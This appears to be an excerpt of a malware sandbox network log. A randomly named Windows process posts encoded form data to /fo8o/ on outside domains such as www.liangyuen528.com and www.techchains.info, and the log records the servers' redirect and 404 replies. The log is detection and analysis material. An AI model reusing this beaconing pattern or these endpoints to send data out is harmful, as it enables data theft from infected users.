                                          Aug 30, 2024 09:42:06.562920094 CEST1236INData Raw: 6e 65 3b 63 6f 6c 6f 72 3a 23 30 61 34 38 66 66 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 3a 33 70 78 20 30 20 36 70 78 20 30 3b 6d 61 72 67 69 6e 3a
                                          Data Ascii: ne;color:#0a48ff}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#000}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#0a48ff}.two-tier-ads-list__list-eleme5
                                          Aug 30, 2024 09:42:06.562931061 CEST1236INData Raw: 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 31 39 64 61 36 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e
                                          Data Ascii: -size:12px}.container-buybox__content-link{color:#919da6}.container-buybox__content-link--no-decoration{text-decoration:none}.container-searchbox{margin-bottom:50px;text-align:center}.container-searchbox__content{display:inline-block;font-fami
                                          Aug 30, 2024 09:42:06.562942982 CEST1236INData Raw: 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 70 72 69 76 61 63 79 50 6f 6c 69 63 79 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 35 35 35 7d 2e 63 6f 6e 74 61 69 6e 65 72
                                          Data Ascii: -block}.container-privacyPolicy__content-link{font-size:10px;color:#555}.container-cookie-message{position:fixed;bottom:0;width:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text
                                          Aug 30, 2024 09:42:06.562952995 CEST1236INData Raw: 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6c 6f 73 65 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 62 6f 64 79 20 74
                                          Data Ascii: ookie-modal-window__close{width:100%;margin:0}.cookie-modal-window__content-body table{width:100%;border-collapse:collapse}.cookie-modal-window__content-body table td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-row{backgr
                                          Aug 30, 2024 09:42:06.562959909 CEST1236INData Raw: 61 63 69 74 79 3a 30 3b 77 69 64 74 68 3a 30 3b 68 65 69 67 68 74 3a 30 7d 2e 73 77 69 74 63 68 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 36 30 70 78
                                          Data Ascii: acity:0;width:0;height:0}.switch{position:relative;display:inline-block;width:60px;height:34px}.switch__slider{position:absolute;cursor:pointer;top:0;left:0;right:0;bottom:0;background-color:#5a6268;-webkit-transition:.4s;transition:.4s}.switc
                                          Aug 30, 2024 09:42:06.567924976 CEST1236INData Raw: 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 22 2c 22 61 64 62 6c 6f 63 6b 6b 65 79 22 3a 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a
                                          Data Ascii: mg.sedoparking.com","adblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vL576Y4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_OO+uFz6o+h7SW/VOmAVybmlqkFLCE9wutgpstRV7Umf9unB4i9wSAKAy


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          17192.168.2.44975415.197.212.58803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:11.910706043 CEST785OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.liangyuen528.com
                                          Origin: http://www.liangyuen528.com
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 205
                                          Referer: http://www.liangyuen528.com/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 76 67 67 45 65 62 73 6b 4c 4e 51 2b 59 70 6c 77 64 34 36 6c 59 58 62 73 38 33 53 46 77 42 69 56 50 35 55 6c 36 77 4d 30 64 4c 59 51 2b 30 72 76 56 4b 73 76 66 37 62 52 4f 30 69 34 6a 75 36 61 71 63 6f 79 45 5a 31 73 73 41 2f 38 53 52 38 4b 58 67 6f 37 49 47 46 48 79 50 6e 58 54 72 31 61 46 37 63 67 6c 52 63 37 38 37 62 56 46 64 65 57 77 47 74 4f 65 6a 6b 64 4d 47 46 70 51 6f 36 69 7a 6b 49 6e 79 62 6c 30 79 43 50 6f 38 33 4c 33 6f 71 55 4c 49 45 59 53 6d 74 69 74 43 30 32 34 6a 62 74 44 4a 69 61 50 55 5a 7a 75 64 30 42 4f 71 2b 76 47 31 73 33 6e 45 55 53 2f 43 78 75 37 42 51 3d 3d
                                          Data Ascii: elJtehkH=vggEebskLNQ+Yplwd46lYXbs83SFwBiVP5Ul6wM0dLYQ+0rvVKsvf7bRO0i4ju6aqcoyEZ1ssA/8SR8KXgo7IGFHyPnXTr1aF7cglRc787bVFdeWwGtOejkdMGFpQo6izkInybl0yCPo83L3oqULIEYSmtitC024jbtDJiaPUZzud0BOq+vG1s3nEUS/Cxu7BQ==


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          18192.168.2.44975515.197.212.58803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:14.445593119 CEST805OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.liangyuen528.com
                                          Origin: http://www.liangyuen528.com
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 225
                                          Referer: http://www.liangyuen528.com/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 76 67 67 45 65 62 73 6b 4c 4e 51 2b 5a 4a 31 77 66 65 79 6c 51 58 62 74 67 6e 53 46 6d 78 69 52 50 35 59 6c 36 30 55 6b 64 35 4d 51 39 51 76 76 55 49 45 76 59 37 62 52 61 6b 69 35 2b 2b 36 76 71 63 6b 51 45 62 52 73 73 41 62 38 53 51 67 4b 58 54 41 34 4a 57 46 53 37 76 6e 4a 4d 37 31 61 46 37 63 67 6c 52 4a 65 38 37 44 56 47 75 47 57 77 6a 5a 4e 58 44 6b 61 4c 47 46 70 43 59 36 6d 7a 6b 49 56 79 5a 51 76 79 42 6e 6f 38 33 62 33 6f 59 38 45 53 55 59 75 34 74 6a 79 47 58 58 32 6d 72 6f 67 57 78 61 68 58 59 72 65 56 53 51 55 37 50 4f 52 6e 73 54 55 5a 54 62 4c 50 79 54 79 61 64 58 36 45 4f 37 5a 6f 51 46 32 62 39 53 56 32 78 57 57 65 64 67 3d
                                          Data Ascii: elJtehkH=vggEebskLNQ+ZJ1wfeylQXbtgnSFmxiRP5Yl60Ukd5MQ9QvvUIEvY7bRaki5++6vqckQEbRssAb8SQgKXTA4JWFS7vnJM71aF7cglRJe87DVGuGWwjZNXDkaLGFpCY6mzkIVyZQvyBno83b3oY8ESUYu4tjyGXX2mrogWxahXYreVSQU7PORnsTUZTbLPyTyadX6EO7ZoQF2b9SV2xWWedg=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          19192.168.2.44975615.197.212.58803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:16.979105949 CEST10887OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.liangyuen528.com
                                          Origin: http://www.liangyuen528.com
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 10305
                                          Referer: http://www.liangyuen528.com/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 76 67 67 45 65 62 73 6b 4c 4e 51 2b 5a 4a 31 77 66 65 79 6c 51 58 62 74 67 6e 53 46 6d 78 69 52 50 35 59 6c 36 30 55 6b 64 35 55 51 39 6a 33 76 56 70 45 76 5a 37 62 52 5a 6b 69 43 2b 2b 36 32 71 63 4d 55 45 62 74 38 73 43 7a 38 53 79 6f 4b 52 69 41 34 51 6d 46 53 32 50 6e 55 54 72 30 43 46 37 4d 6b 6c 52 5a 65 38 37 44 56 47 76 32 57 35 57 74 4e 56 44 6b 64 4d 47 45 6f 51 6f 36 4f 7a 6b 41 46 79 5a 45 2f 7a 77 48 6f 2f 57 72 33 37 38 63 45 4b 45 59 6f 39 74 6a 36 47 58 62 39 6d 72 30 57 57 79 47 4c 58 59 50 65 58 53 56 52 70 4e 4b 78 38 75 4b 48 4c 44 54 33 50 68 6a 76 56 4e 54 57 58 65 44 37 36 45 52 4a 64 63 50 6b 6d 6b 4f 76 50 59 64 49 4e 51 63 42 44 35 4a 72 70 38 57 50 62 47 53 73 63 39 56 35 61 59 51 57 64 6b 6f 31 5a 54 46 4e 37 6e 33 6c 6a 74 64 69 64 66 6e 33 34 77 53 47 73 36 76 52 7a 6e 4a 4e 38 61 69 31 67 79 41 63 49 47 43 75 38 39 44 42 62 31 62 34 50 59 52 55 32 39 2b 6b 69 58 70 76 36 64 2f 48 74 38 38 66 71 6c 7a 75 77 4e 66 57 52 4e 66 72 41 70 2b 55 53 [TRUNCATED]
                                          Data Ascii: elJtehkH=vggEebskLNQ+ZJ1wfeylQXbtgnSFmxiRP5Yl60Ukd5UQ9j3vVpEvZ7bRZkiC++62qcMUEbt8sCz8SyoKRiA4QmFS2PnUTr0CF7MklRZe87DVGv2W5WtNVDkdMGEoQo6OzkAFyZE/zwHo/Wr378cEKEYo9tj6GXb9mr0WWyGLXYPeXSVRpNKx8uKHLDT3PhjvVNTWXeD76ERJdcPkmkOvPYdINQcBD5Jrp8WPbGSsc9V5aYQWdko1ZTFN7n3ljtdidfn34wSGs6vRznJN8ai1gyAcIGCu89DBb1b4PYRU29+kiXpv6d/Ht88fqlzuwNfWRNfrAp+USVuanqk1370B5sUCMFm93U0mW9nwPc98vuEUYKfQkt31d9Hk6q0vNYpuyq1YEyO8HBvhQafgLy0ovgyS8Pvmxu6pQB5ACftCAWG6/1Ark8uNESZ9ZynmGmQpzcriqO8lGsSwW0V34SEGjjGVc+q2Z/e0wzy08MITt3Kd3g3yToSXokemk/+3v71C7mlseQYTEYCLkqrLL3gKdnWfEWRzgx8IGeua0I7irOhkZGZvMvX52nkRY2ROcqe6zlY5AeMUOQ/S7ZNx1gifgscQWGPjTfYwedMuhj5HvSzPF5fOmvkeYCtASZzAsHYNfBn+JgZEcZ9Xv7tbR5o/MZjRmyhZEQz7/Ed3Nff+CF2CTkz1osBm6YJ0F0yLeWvcN60hcddMEGjtz7g+z2+w87CCadZNTN5mkGhlVElAy5iIeVcsOdSxa7FeI9EO4Vdnymgi7y5OZBtBtsafv5LEYKiBTlyY4Gjg73b6FKJqk1tCU5QkjpYcqiUEi3lJBVPt1fQdY1buiS+3RrfX+cCV0VjSqSVdj0pNFvUllxgGhzNZLGOxBgA2GpLr7ktOSej8L4rWG9GSADYIYe0VYyFe8N55q8kXowA9G9Mgc4vnZ1fpIIIr6cgXXGH5cNTQv7nUAqeSJL62zImko9YvAO8fmiAcW/yu2e/Fu9rrN78OYzN [TRUNCATED]


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          20192.168.2.44975715.197.212.58803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:19.518649101 CEST510OUTGET /fo8o/?elJtehkH=iiIkdrB6KYcVQoNzCqChYUKXjXuh+zOUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+WWEI+6zwDYddHqMnjE16qa6vLdOP6EYvTw8=&z8_=glwH5BKp HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Host: www.liangyuen528.com
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Aug 30, 2024 09:42:19.974818945 CEST397INHTTP/1.1 200 OK
                                          Server: openresty
                                          Date: Fri, 30 Aug 2024 07:42:19 GMT
                                          Content-Type: text/html
                                          Content-Length: 257
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 6c 4a 74 65 68 6b 48 3d 69 69 49 6b 64 72 42 36 4b 59 63 56 51 6f 4e 7a 43 71 43 68 59 55 4b 58 6a 58 75 68 2b 7a 4f 55 53 4f 63 34 31 79 4d 31 51 2f 6b 39 37 6a 69 4a 63 6f 6b 75 57 50 62 4f 54 78 69 43 6f 64 47 57 69 4f 51 6b 55 72 70 32 31 6c 33 37 65 79 4d 65 4c 54 70 2b 57 57 45 49 2b 36 7a 77 44 59 64 64 48 71 4d 6e 6a 45 31 36 71 61 36 76 4c 64 4f 50 36 45 59 76 54 77 38 3d 26 7a 38 5f 3d 67 6c 77 48 35 42 4b 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?elJtehkH=iiIkdrB6KYcVQoNzCqChYUKXjXuh+zOUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+WWEI+6zwDYddHqMnjE16qa6vLdOP6EYvTw8=&z8_=glwH5BKp"}</script></head></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          21192.168.2.44975866.29.149.46803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:25.290426016 CEST782OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.techchains.info
                                          Origin: http://www.techchains.info
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 205
                                          Referer: http://www.techchains.info/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 2b 53 2f 61 53 52 75 44 6a 49 4c 65 52 30 63 34 56 6b 6a 6a 56 4e 64 79 32 5a 68 6a 50 75 73 66 51 3d 3d
                                          Data Ascii: elJtehkH=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXI+S/aSRuDjILeR0c4VkjjVNdy2ZhjPusfQ==
                                          Aug 30, 2024 09:42:25.788676023 CEST637INHTTP/1.1 404 Not Found
                                          Date: Fri, 30 Aug 2024 07:42:25 GMT
                                          Server: Apache
                                          Content-Length: 493
                                          Connection: close
                                          Content-Type: text/html
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          22192.168.2.44975966.29.149.46803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:28.014693975 CEST802OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.techchains.info
                                          Origin: http://www.techchains.info
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 225
                                          Referer: http://www.techchains.info/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 70 75 76 78 51 56 75 4d 54 6c 45 56 6d 4c 76 34 52 72 53 73 79 31 5a 71 7a 64 6e 4b 6a 59 2f 51 51 3d
                                          Data Ascii: elJtehkH=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVpuvxQVuMTlEVmLv4RrSsy1ZqzdnKjY/QQ=
                                          Aug 30, 2024 09:42:28.599447966 CEST637INHTTP/1.1 404 Not Found
                                          Date: Fri, 30 Aug 2024 07:42:28 GMT
                                          Server: Apache
                                          Content-Length: 493
                                          Connection: close
                                          Content-Type: text/html
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          23192.168.2.44976066.29.149.46803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:30.562743902 CEST10884OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.techchains.info
                                          Origin: http://www.techchains.info
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 10305
                                          Referer: http://www.techchains.info/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 77 4e 31 67 46 4d 79 78 42 4d 2f 74 4e 50 62 42 6b 57 57 67 36 35 72 57 39 4f 68 53 34 37 52 2b 49 76 2f 74 6c 59 78 46 53 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4d 62 77 6e 74 34 44 51 71 68 38 63 4e 67 73 67 6b 32 32 38 6b 32 4c 35 50 6e 67 59 79 6f 4f 64 66 6c 6e 46 72 57 37 4d 33 4c 63 46 50 73 78 68 52 66 2b 2f 2f 44 34 64 63 54 77 61 4f 56 4c 68 76 33 65 43 55 5a 71 70 75 73 48 77 79 58 [TRUNCATED]
